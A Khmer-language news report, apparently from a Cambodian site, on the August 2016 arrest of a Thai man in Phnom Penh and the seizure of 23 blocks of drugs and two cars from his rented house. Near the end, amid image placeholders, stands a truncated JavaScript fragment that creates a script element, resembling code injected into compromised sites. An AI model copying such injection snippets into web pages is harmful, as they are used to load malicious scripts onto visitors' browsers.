(Video) នាំខ្លួនមេខ្លោងជួញដូរគ្រឿងញៀនជនជាតិថៃមកឆែកឆេរ នៅផ្ទះល្វែងក្នុងបូរីពិភពថ្មី ភូមិបាយ៉ាប រឹបអូស គ្រឿងញៀនរាប់គីឡូទៀត

ភ្នំពេញ៖ កម្លាំងជំនាញរបស់មន្ទីរប្រឆាំងគ្រឿងញៀនក្រសួងមហាផ្ទៃបាន នាំខ្លួនបុរសជនជាតិថៃម្នាក់ទៅ ឆែកឆេរផ្ទះជួលក្នុងនោះបានរកឃើញគ្រឿងញៀន០៣ប្រភេទមានចំនួន២៣ដុំ។កាលពីម៉ោង១៦និង៣០នាទីល្ងាចថ្ងៃទី០២សីហា២០១៦នៅផ្ទះល្វែងលេខ០៥ផ្លូវNW០៦ក្នុងបូរីបិភពថ្មីក្រុម៧ភូមិបាយ៉ាប សង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខ។
ប្រតិបត្តិការបង្ក្រាបបទល្មើសគ្រឿងញៀនដ៍ធំនេះ ដឹកនាំបញ្ជាផ្ទាល់ពីលោកឧត្តម សេនីយ៍ឯក ខៀវ សាម៉ន នាយកមន្ទីរប្រឆាំងគ្រឿងញៀន ក្រសួងមហាផ្ទៃលោកឧត្តមសេនីយ៍ទោ សាន សុទ្ធីនាយករងមន្ទី លោក វរៈសេនីយ៍ទោ ឈូក គា នាយរងការិយាល័យនិងលោកវរៈសេនីយ៍ឯក ម៉ក់ ហុង អធិការខណ្ឌ សែនសុខ ដោយមានការសំម្រប សំរួលពីលោក អ៊ុំ សុភក្តិ ព្រះរាជអាជ្ញារង អមសាលាដំបូងរាជធានី ភ្នំពេញនិងកម្លាំងសមត្ថកិច្ចឃាច្រើននាក់ទៀត។

សមត្ថកិច្ចបានឲ្យដឹងថា ជនសង្ស័យមានឈ្មោះ ឆៃ យ៉ាភុងភិសៃផាន់ ហៅក្រៅឈ្មោះហង្ស សុភាព
អាយុ៥២ឆ្នាំ ជនជាតិថៃស្នាក់នៅផ្ទះជួលល្វែង លេខ០៥ផ្លូវNW០៦ក្នុងបូរីបិភពថ្មីក្រុម៧ភូមិបាយ៉ាប សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។

សមត្ថកិច្ចប្រាប់ថាមុនដល់ឈានការឃាត់ខ្លួនជនសង្ស័យខាងលើគឺកម្លាំងជំនាញបានធ្វើការស៊ើបអង្កេតស្រាវជ្រាវកំណត់មុខសញ្ញានេះជាយូមកហើយទើបឃាត់ខ្លួនភ្លាមៗក្នុងបទល្មើសជាក់ស្តែងជាមួយនឹងថ្នាំញៀនចំនួន០៣ដុំ។

សមត្ថកិច្ចបានប្រាប់ទៀតថាបុរសជនជាតិថៃម្នាក់ខាងលើនេះត្រូវបានកម្លាំងជំនាញរបស់មន្ទីរប្រឆាំងគ្រឿងញៀនក្រសួងមហាផ្ទៃបើកប្រតិបត្តិការបង្ក្រាបឃាត់ខ្លួនបានភ្លាមៗជាមួយនឹងវត្ថុតាងថ្នាំញៀនប្រភេទម៉េតំហ្វេតាមីន(ICE)ទឹកកកទម្ងន់៣គីឡូក្រាមកាលពីវេលាម៉ោង១៨ល្ងាចថ្ងៃទី១ ខែសីហា ឆ្នាំ២០១៦ នៅ ចំណុចផ្លូវលំ ភូមិត្រពាំងឈូក សង្កាត់ទឹកថ្លាខណ្ឌសែនសុខក្រោយ ពីឃាត់ហើយត្រូវបាននាំខ្លួនយក ទៅធ្វើការសាកសួរនៅមន្ទីរប្រឆាំងគ្រឿងញៀនក្រសួងមហាផ្ទៃលុះដល់ល្ងាចខាងលើបានឈានទៅធ្វើការឆែកឆេរដល់អាស្រ័យដ្ឋានខាងលើបន្តរទៀត ។

ក្នុងប្រតិបត្តិការណ៍ឆែកឆេរលំនៅដ្ឋានខាងលើសមត្ថកិច្ចបានរកឃើញវ៉ាលីពណ៌ខ្មៅចំនួន១ហើយបើកមើលឃើញមានគ្រឿងញៀនក្នុងកាបូបខាងលើមានចំនួន២៣ដុំ(មាន៣ប្រភេទ)នៅក្នុងនោះនិងបានដកហូត រថយន្តចំនួន២គ្រឿងម៉ាកឡង់គ្រីស័រ
ពណ៌ស្ករ១គ្រឿងស្លាកលេខភ្នណពេញ2C-8599និងរថយន្តម៉ាកសឺដេសពណ៌ទឹកប្រាក់ស្លាកលេខ
ភ្នំពេញ 2H-6266 ។
បច្ចុប្បន្នវត្ថុតាងទាំងអស់ខាងលើបាននាំយកទៅ មន្ទីរប្រឆាំងគ្រឿងញៀនក្រសួងមហាផ្ទៃ។

image image imageimage image image image image imageimageimageimageimageimageimageimageimageimageimageimage

image-522-768x765-1var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More